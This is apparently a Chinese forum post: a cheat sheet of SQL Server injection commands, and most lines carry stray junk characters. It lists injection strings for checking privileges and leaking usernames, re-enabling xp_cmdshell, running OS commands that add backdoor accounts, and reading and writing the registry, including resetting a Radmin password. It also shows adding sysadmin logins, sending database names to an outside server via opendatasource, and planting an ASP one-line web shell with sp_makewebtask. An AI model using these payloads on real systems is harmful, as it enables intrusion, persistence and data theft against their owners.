阿Ｄ常用的一些注入命令

admin

阿Ｄ常用的一些注入命令
% r) D4 H8 U' l& r2 ~//看看是什么权限的
and 1=(Select IS_MEMBER('db_owner'))
9 u  `% w, g; l9 m: z) UAnd char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--
' v9 c' W# @1 b4 e3 ~- t' K
//检测是否有读取某数据库的权限
/ A6 r% u& n+ e4 Q) _8 O" X: f8 \and 1= (Select HAS_DBACCESS('master'))
And char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 --

) Z/ o8 P1 w) j' q  U
" y5 L' i  M4 f9 x( ^: C数字类型
) t0 N' X( O' A9 @8 y  [9 @# gand char(124)%2Buser%2Bchar(124)=0
+ ?) t9 m- X3 v
字符类型
( j2 l5 B7 S/ m! l' K9 r# R' and char(124)%2Buser%2Bchar(124)=0 and ''='
! M" v! \9 N& p" Q) }
搜索类型
' and char(124)%2Buser%2Bchar(124)=0 and '%'='

; j/ \% t& J3 H3 i/ b& i* B爆用户名
and user>0
/ f  _' \) J: M. G* `; n- A' and user>0 and ''='

检测是否为SA权限
and 1=(select IS_SRVROLEMEMBER('sysadmin'));--
+ Y9 Z4 I% U7 G7 Z5 j& b/ @, gAnd char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 --

检测是不是MSSQL数据库
and exists (select * from sysobjects);--
5 ]! r  s  x# N4 b8 v, z$ n, R
检测是否支持多行
! z( r+ R- H& ~;declare @d int;--

% V* J4 h$ Q; o- X恢复 xp_cmdshell
0 ^5 {& s% k! D! a6 O7 p) r+ A;exec master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';--

5 {  K- J' O% Z: w& {
( B+ w3 {& t8 M9 `& c; nselect * from openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafpaf','select @@version')
9 d4 h, G$ V# X+ D8 D
//-----------------------
. x" _" u& b  w2 e//      执行命令
: h+ e- y! g" G- C0 C* C4 Z//-----------------------
, J7 J2 D  i: a* C7 J; |! ^首先开启沙盘模式：
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1

. Z7 N" a6 T0 z/ V$ z* |然后利用jet.oledb执行系统命令
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')
/ h0 Q+ E) Z" k! p; ~
执行命令
;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user paf pafpaf /add';--

) |* u" O) ?% Q0 f3 x! `: bEXEC [master].[dbo].[xp_cmdshell] 'cmd /c md c:\1111'

4 u) e6 m4 X  K' ?9 W# U判断xp_cmdshell扩展存储过程是否存在：
http://192.168.1.5/display.asp?keyno=188 and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell')

写注册表
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1

REG_SZ

6 U. e) T' T0 n+ s" F  \: l3 Z读注册表
& @% |1 F2 Z7 K; t1 ^, `% eexec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon','Userinit'

6 O* `. _$ l7 i读取目录内容
* B- b% l  I/ r! X& k1 _" Yexec master..xp_dirtree 'c:\winnt\system32\',1,1
" N2 D$ m: j4 }: o

8 w- H' d  Z( a/ |数据库备份
backup database pubs to disk = 'c:\123.bak'
" N. Z# F, {, `) T
0 R3 k, O; o& n  L' ?* k//爆出长度
4 Q' N. @1 e6 {4 f' A0 W; J0 o; A8 WAnd (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_Tmp)=0 ;--

( X1 |. M2 p% e( r- O0 Y- e/ M

更改sa口令方法：用sql综合利用工具连接后，执行命令：
exec sp_password NULL,'新密码','sa'

添加和删除一个SA权限的用户test：
% i9 w( j& i  {# Rexec master.dbo.sp_addlogin test,ptlove
$ T" i: A4 W, j# T$ Cexec master.dbo.sp_addsrvrolemember test,sysadmin

删除扩展存储过过程xp_cmdshell的语句:
exec sp_dropextendedproc 'xp_cmdshell'
! g+ K8 Z5 i) u  Z' T" ~
添加扩展存储过过程
. M8 g' ~# U- M- L) F9 e$ z0 {EXEC [master]..sp_addextendedproc 'xp_proxiedadata', 'c:\winnt\system32\sqllog.dll'
1 ~# X( w) B7 ~+ x$ i+ R  xGRANT exec On xp_proxiedadata TO public
2 u% I; M- L7 Y& c( I6 v' ~
- x9 }# l: d# Z: p; g( M
停掉或激活某个服务。
& t. L; d- g0 L3 o0 e9 A* G. b
exec master..xp_servicecontrol 'stop','schedule'
4 h9 P2 }3 v- f7 e8 ]" D0 g1 e! `& I/ sexec master..xp_servicecontrol 'start','schedule'

dbo.xp_subdirs

6 s/ @6 ^# J( C6 }1 Y9 H! R只列某个目录下的子目录。
- u3 h0 j7 z. Bxp_getfiledetails 'C:\Inetpub\wwwroot\SQLInject\login.asp'
: g8 e8 m: o; |2 |: a- O
0 b& f) R7 M  f  j9 V' F' u0 a" Sdbo.xp_makecab

将目标多个档案压缩到某个目标档案之内。
, z4 ~' u/ A; ^2 G" w所有要压缩的档案都可以接在参数列的最后方，以逗号隔开。
: f; F' [2 P+ G5 d; G
dbo.xp_makecab
'c:\test.cab','mszip',1,
2 S" y- a4 y. M: R'C:\Inetpub\wwwroot\SQLInject\login.asp',
- N+ ]) w! W3 V, N6 K' S  }'C:\Inetpub\wwwroot\SQLInject\securelogin.asp'

* Q$ h5 t% X  f- i0 uxp_terminate_process
5 F% @: \6 E6 y' d
停掉某个执行中的程序，但赋予的参数是 Process ID。
利用”工作管理员”，透过选单「检视」-「选择字段」勾选 pid，就可以看到每个执行程序的 Process ID

- S5 `. X+ W6 ]1 |$ e! jxp_terminate_process 2484
3 x) Q; Q! `6 e. N7 G3 J
; o1 ~- b& d- v( \2 dxp_unpackcab
$ [# Y  I$ X$ \( A& a
4 n1 ~1 |! [  k' A0 P9 _, ~5 n. k解开压缩档。
  ^4 a6 e/ D: L. b3 U
xp_unpackcab 'c:\test.cab','c:\temp',1

4 d9 q: ~' h" F/ w0 y) h# r
某机，安装了radmin，密码被修改了，regedit.exe不知道被删除了还是被改名了，net.exe不存在，没有办法使用regedit /e 导入注册文件，但是mssql是sa权限，使用如下命令 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY',0x02ba5e187e2589be6f80da0046aa7e3c 即可修改密码为12345678。如果要修改端口值 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','port','REG_BINARY',0xd20400 则端口值改为1234

! _7 B6 a6 z  Rcreate database lcx;
Create TABLE ku(name nvarchar(256) null);
Create TABLE biao(id int NULL,name nvarchar(256) null);

! i" r+ \0 I' O# u5 S) J) h//得到数据库名
, M  t2 w0 ^3 b' M8 L2 Einsert into opendatasource('sqloledb','server=211.39.145.163,1443;uid=test;pwd=pafpaf;database=lcx').lcx.dbo.ku select name from master.dbo.sysdatabases

( B' e' q5 C9 S
//在Master中创建表，看看权限怎样
3 @& t3 H! k4 F6 b4 K0 l: lCreate TABLE master..D_TEST(id nvarchar(4000) NULL,Data nvarchar(4000) NULL);--
$ D$ ]: A  A4 |: D
4 C* Q0 J: C4 O, K$ b+ \用 sp_makewebtask直接在web目录里写入一句话马：
1 y9 w4 Z# X) q0 Y6 W* L1 N( l& h; Phttp://127.0.0.1/dblogin123.asp?username=123';exec%20sp_makewebtask%20'd:\www\tt\88.asp','%20select%20''<%25execute(request("a"))%25>''%20';--
5 e) a. Q0 e1 V2 f6 v+ R) a
( n8 b# n- e' M- ~. \( I# c4 q4 G//更新表内容
Update films SET kind = 'Dramatic' Where id = 123
/ R* Y+ c+ J7 ^8 E3 l4 j9 w: @
  K2 i" R/ e% S! h7 h6 T5 K6 g//删除内容
7 _0 b1 M( [  i+ }delete from table_name where Stockid = 3